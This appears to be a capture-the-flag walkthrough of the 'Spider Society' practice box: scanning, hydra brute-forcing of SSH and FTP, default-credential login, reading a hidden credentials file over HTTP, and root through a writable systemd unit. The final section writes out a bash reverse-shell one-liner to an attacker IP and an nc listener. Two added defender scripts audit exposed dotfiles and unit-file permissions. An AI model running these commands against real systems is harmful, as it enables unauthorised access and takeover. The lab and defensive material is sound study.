Spider Society Walkthrough

Summary:

Spider Society is a practice box on Offensive Security’s Proving Grounds that emphasizes web application enumeration and classic Linux privilege-escalation techniques.


NMAP

[+] I typically start by scanning all ports, then run a more detailed scan against the specific ports that were identified. I also use rustscan to verify that nmap did not miss any open ports.

nmap -p- -T4 $ip
rustscan -a $ip --ulimit 5000
nmap -A -T4 -p 22,80,2121 $ip -oN nmap.fulltcp

Port Enumeration

[+] Before checking out port 80, let's rule out any low-hanging fruit on SSH or FTP.

hydra -C ftp-betterdefaultpasslist.txt ssh://192.168.249.214 -t 4 -v
hydra -s 2121 -C ftp-betterdefaultpasslist.txt ftp://192.168.249.214 -t 4 -v

These brute-force attacks were unsuccessful, which I figured would be the case.

Web Enumeration

[+] Checking out port 80, the landing page has a login form that leads to a 404 page. Towards the bottom of the page there is an email address that reveals the domain name. It's always important to add this to our /etc/hosts file; add both the domain and the subdomain.

[+] Now that we have our domains listed in our hosts file, we can run directory-busting scans against them.

gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -k -t 30
gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -k -t 30

We get a hit for a directory named libspider.

[+] Navigating to the directory found by our scan, we land on a login page. Testing for default creds is always an important step; many times, admins choose convenience over security. The ole reliable admin:admin worked perfectly, and we find a communications tab that presents us with a set of login credentials.

[+] Password reuse is worth testing, so we could try these creds against SSH, but they don't work there; as the username suggests, these creds are intended for FTP.

ftp 192.168.212.214 -p 2121

[+] We find a hidden file that we cannot download or view over FTP. The same FTP directory contains control-panel.php, which is the URL path we are currently on after logging in, so the FTP directory doubles as the web root of /libspider/. That means we should be able to curl the same path, swap control-panel.php for the hidden file name, and read its contents over HTTP. Let's test it.

curl http://offsec.lab/libspider/.fuhfjkzbdsfuybefzmdbbzdcbhjzdbcukbdvbsdvuibdvnbdvenv
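
From the defender's side, the weakness here is that a directory writable over FTP is also served by the web server, so any file dropped there, dotfiles included, is readable by anyone who learns its name. The script below is an added example and not part of the original walkthrough: it lists dotfiles sitting under a web root and pulls hidden-file requests (the curl above would be one) out of a combined-format access log. The webroot layout, the `.hidden_env` file name and the log lines are constructed sample data, and the function names are my own.

```sh
#!/bin/sh
# Added example (not from the walkthrough): defender-side checks for a web root
# that serves dotfiles. Assumes a webroot directory and an Apache/nginx style
# combined access log; all paths and log lines below are constructed.

# find_exposed_dotfiles WEBROOT
# Prints, sorted, every dotfile under WEBROOT that the server would serve unless
# its config blocks it. .htaccess is skipped because Apache's default config
# already refuses to serve .ht* files.
find_exposed_dotfiles() {
    find "$1" -type f -name '.*' ! -name '.htaccess' | sort
}

# dotfile_requests LOGFILE
# Prints the access-log lines whose request path contains a "/." component,
# i.e. a client fetching a hidden file over HTTP.
dotfile_requests() {
    # field 2 of the double-quoted request ("GET /path HTTP/1.1") holds the path
    awk -F'"' '{ split($2, r, " "); if (r[2] ~ /\/\./) print }' "$1"
}

# count_dotfile_requests LOGFILE: number of such lines
count_dotfile_requests() {
    dotfile_requests "$1" | wc -l | tr -d ' '
}

# make_fixture
# Builds a throwaway webroot and access log from constructed sample data and
# prints "WEBROOT LOGFILE".
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/www/libspider"
    echo "<?php // placeholder ?>" > "$d/www/libspider/control-panel.php"
    echo "FTP_PASS=placeholder" > "$d/www/libspider/.hidden_env"   # constructed
    echo "placeholder" > "$d/www/.htaccess"
    cat > "$d/access.log" <<'EOF'
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /libspider/control-panel.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /libspider/.hidden_env HTTP/1.1" 200 64 "-" "curl/8.0"
192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.12 - - [01/Jan/2024:10:00:12 +0000] "GET /.git/config HTTP/1.1" 404 200 "-" "curl/8.0"
EOF
    printf '%s %s\n' "$d/www" "$d/access.log"
}

# Demo run on the constructed fixture.
set -- $(make_fixture)
echo "dotfiles in web root:";      find_exposed_dotfiles "$1"
echo "requests for hidden files:"; dotfile_requests "$2"
rm -rf "$(dirname "$1")"
```

On a real host, point `find_exposed_dotfiles` at the document root and `dotfile_requests` at the live access log. Anything the first function reports should either be moved out of the document root or blocked by a server rule that refuses paths containing `/.`; the FTP upload directory should not be the document root in the first place.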

Initial Access

[+] Great! We got more creds. There are no other login portals within the Spider Society application, so let's test these against the only other port open to us externally: SSH!

ssh spidey@192.168.212.214

We’re In!

Priv Esc

[+] As any ethical hacker knows, the first thing to check is whether our current user has any sudo privileges we can abuse. In this case it looks like we do. I also like to run automated tools like linpeas and start pspy to look for processes and cron jobs we may be able to exploit.

sudo -l
systemctl list-units --type=service --all | grep spider
systemctl cat spiderbackup.service

We verify that the service exists by listing units with systemctl and grepping for its name, and then we can view the contents of the unit file with systemctl cat.

[+] Before we attempt any escalation path, we must confirm we have write permissions on this service file.

ls -la /etc/systemd/system/spiderbackup.service

The service file is owned by our current user, so we can definitely modify it.
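
The check a defender would run for this class of weakness is the same question in reverse: which unit files, and which programs they start, can be changed by someone other than root? The script below is an added example and not part of the walkthrough. It audits every `*.service` under a directory for non-root ownership and group/world write bits, then applies the same test to the program named on the `ExecStart=` line. `audit_units`, `check_file`, `exec_target` and the fixture are my own names, the sample unit files are constructed, and GNU `stat` is assumed.

```sh
#!/bin/sh
# Added example (not from the walkthrough): audit systemd unit files for the
# misconfiguration shown above, i.e. a unit file or its ExecStart target that a
# non-root user can modify. POSIX sh plus GNU stat(1); assumes unit files live
# in DIR and that TRUSTED_OWNER (default root) is the only account that should
# own them.

# check_file PATH TRUSTED_OWNER LABEL
# Prints "PATH<TAB>reason" for each problem; returns 1 if any, else 0.
check_file() {
    path=$1; trusted=$2; label=$3; bad=0
    owner=$(stat -c '%U' "$path") || return 0    # skip unreadable/missing files
    mode=$(stat -c '%a' "$path")
    if [ "$owner" != "$trusted" ]; then
        printf '%s\t%s owned by %s, expected %s\n' "$path" "$label" "$owner" "$trusted"
        bad=1
    fi
    # second-to-last octal digit = group bits, last = other bits;
    # 2, 3, 6 and 7 are the digits that carry the write bit
    case $mode in
        *[2367][0-7]) printf '%s\t%s mode %s is group-writable\n' "$path" "$label" "$mode"; bad=1 ;;
    esac
    case $mode in
        *[2367]) printf '%s\t%s mode %s is world-writable\n' "$path" "$label" "$mode"; bad=1 ;;
    esac
    return $bad
}

# exec_target UNIT_FILE
# Prints the program run by the first ExecStart= line, stripping the prefix
# characters (- @ : + !) systemd allows in front of the path.
exec_target() {
    sed -n 's/^ExecStart=[-@:+!]*\([^ ]*\).*/\1/p' "$1" | head -n 1
}

# audit_units DIR [TRUSTED_OWNER]
# Checks every *.service in DIR and the program each one starts.
# Returns 1 if anything was flagged, 0 if the directory is clean.
audit_units() {
    dir=$1; trusted=${2:-root}; findings=0
    for unit in "$dir"/*.service; do
        [ -f "$unit" ] || continue
        check_file "$unit" "$trusted" "unit" || findings=1
        target=$(exec_target "$unit")
        if [ -n "$target" ] && [ -e "$target" ]; then
            check_file "$target" "$trusted" "ExecStart target" || findings=1
        fi
    done
    return $findings
}

# count_findings DIR TRUSTED_OWNER: number of finding lines
count_findings() {
    audit_units "$1" "$2" | wc -l | tr -d ' '
}

# make_fixture
# Builds a throwaway directory holding one sane unit and one that reproduces
# the problem (constructed sample data); prints the directory path.
make_fixture() {
    d=$(mktemp -d)
    printf '#!/bin/sh\necho ok\n' > "$d/good.sh";                chmod 755 "$d/good.sh"
    printf '[Service]\nExecStart=%s/good.sh\n' "$d" > "$d/good.service"; chmod 644 "$d/good.service"
    printf '#!/bin/sh\necho backup\n' > "$d/spiderbackup.sh";    chmod 777 "$d/spiderbackup.sh"
    printf '[Service]\nExecStart=%s/spiderbackup.sh\n' "$d" > "$d/spiderbackup.service"
    chmod 664 "$d/spiderbackup.service"
    printf '%s\n' "$d"
}

# Demo run. The fixture is owned by the current user, so the trusted owner is
# passed explicitly and only the mode bits trigger; on a real host omit it.
fixture=$(make_fixture)
audit_units "$fixture" "$(id -un)" && echo "no findings" || echo "findings present"
rm -rf "$fixture"
```

On a real host run `audit_units /etc/systemd/system` (and `/usr/local/lib/systemd/system` if it is used) with the default owner of root; a non-empty report means a local user can change what a root service executes. Pairing the audit with an auditd watch on the unit directory gives you the runtime side: the edit and daemon-reload described in the next section show up as a write event rather than being found later.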

Root

[+] We notice the service file uses ExecStart to launch the spiderbackup.sh script in /usr/local/bin. We should be able to point it at the bash binary /bin/bash instead and execute a simple reverse-shell one-liner. Let's modify the file, restart the service, and cross our fingers.

nano /etc/systemd/system/spiderbackup.service # modify service file 
/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.167/443 0>&1' # our revshell payload

[+] Set up a listener to capture the shell, then restart the service to trigger our payload.

#kali
nc -nvlp 443

#Target
sudo /bin/systemctl daemon-reload # refreshes with the current revshell in our service file
sudo /bin/systemctl restart spiderbackup.service # restarts the service and triggers our payload

Pwn3d!